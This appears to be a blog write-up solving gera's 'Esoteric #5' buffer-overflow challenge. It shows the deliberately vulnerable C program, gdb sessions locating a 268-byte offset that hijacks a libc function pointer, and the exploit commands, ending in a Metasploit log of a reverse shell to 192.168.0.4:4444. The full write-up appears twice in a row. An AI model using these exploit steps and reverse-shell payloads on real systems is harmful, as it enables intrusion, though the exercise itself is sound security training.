gera's Esoteric #5.
/* e5.c *
* specially crafted to feed your brain by gera@core-sdi.com */
/* is this possible? */
char buf[256];
int main(int argv,char **argc) {
strcpy(buf,argc[1]);
perror(argc[2]);
while(1);
}
Needs to be compiled statically to get anywhere. It takes 268 bytes to overflow buf in a useful way.
(gdb) run `perl -e 'print "A" x 268 . "BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/dennis/es5/es5 `perl -e 'print "A" x 268 . "BBBB"'`
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) bt
#0 0x42424242 in ?? ()
#1 0x08048a1d in _IO_new_fdopen (fd=5, mode=0x80a2196 "w+") at iofdopen.c:121
#2 0x08048795 in perror (s=0x0) at perror.c:73
#3 0x0804820e in main (argv=2, argc=0xbffffa64) at es5.c:10
#4 0x080482fa in __libc_start_main (main=0x80481e0 <main>, argc=2,
ubp_av=0xbffffa64, init=0x80480b4 <_init>, fini=0x8092620 <_fini>,
rtld_fini=0, stack_end=0xbffffa5c) at ../sysdeps/generic/libc-start.c:129
At buf+268 is the same function pointer as in Esoteric #3, this time via perror().
(gdb) x/x buf+268
0x80a8d4c <__libc_internal_tsd_get>: 0x42424242
Exploit.
[dennis@localhost es5]$ export ES5=`perl sc.pl`
[dennis@localhost es5]$ gcc -o ev5 ev5.c
[dennis@localhost es5]$ ./ev5
ES5 is at 0xbffffc28
[dennis@localhost es5]$ ./es5 `perl -e 'print "A" x 268 . "\x28\xfc\xff\xbf"'`
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.0.4:4444
[*] Starting the payload handler...
[*] Sending stage (36 bytes) to 192.168.0.32
[*] Command shell session 2 opened (192.168.0.4:4444 -> 192.168.0.32:49773) at 2012-12-27 14:58:46 -0600
id
uid=500(dennis) gid=500(dennis) groups=500(dennis)
pwd
/home/dennis/es5
/* e5.c *
* specially crafted to feed your brain by gera@core-sdi.com */
/* is this possible? */
char buf[256];
int main(int argv,char **argc) {
strcpy(buf,argc[1]);
perror(argc[2]);
while(1);
}
Needs to be compiled statically to get anywhere. It takes 268 bytes to overflow buf in a useful way.
(gdb) run `perl -e 'print "A" x 268 . "BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/dennis/es5/es5 `perl -e 'print "A" x 268 . "BBBB"'`
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) bt
#0 0x42424242 in ?? ()
#1 0x08048a1d in _IO_new_fdopen (fd=5, mode=0x80a2196 "w+") at iofdopen.c:121
#2 0x08048795 in perror (s=0x0) at perror.c:73
#3 0x0804820e in main (argv=2, argc=0xbffffa64) at es5.c:10
#4 0x080482fa in __libc_start_main (main=0x80481e0 <main>, argc=2,
ubp_av=0xbffffa64, init=0x80480b4 <_init>, fini=0x8092620 <_fini>,
rtld_fini=0, stack_end=0xbffffa5c) at ../sysdeps/generic/libc-start.c:129
At buf+268 is the same function pointer as in Esoteric #3, this time via perror().
(gdb) x/x buf+268
0x80a8d4c <__libc_internal_tsd_get>: 0x42424242
Exploit.
[dennis@localhost es5]$ export ES5=`perl sc.pl`
[dennis@localhost es5]$ gcc -o ev5 ev5.c
[dennis@localhost es5]$ ./ev5
ES5 is at 0xbffffc28
[dennis@localhost es5]$ ./es5 `perl -e 'print "A" x 268 . "\x28\xfc\xff\xbf"'`
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.0.4:4444
[*] Starting the payload handler...
[*] Sending stage (36 bytes) to 192.168.0.32
[*] Command shell session 2 opened (192.168.0.4:4444 -> 192.168.0.32:49773) at 2012-12-27 14:58:46 -0600
id
uid=500(dennis) gid=500(dennis) groups=500(dennis)
pwd
/home/dennis/es5
No comments:
Post a Comment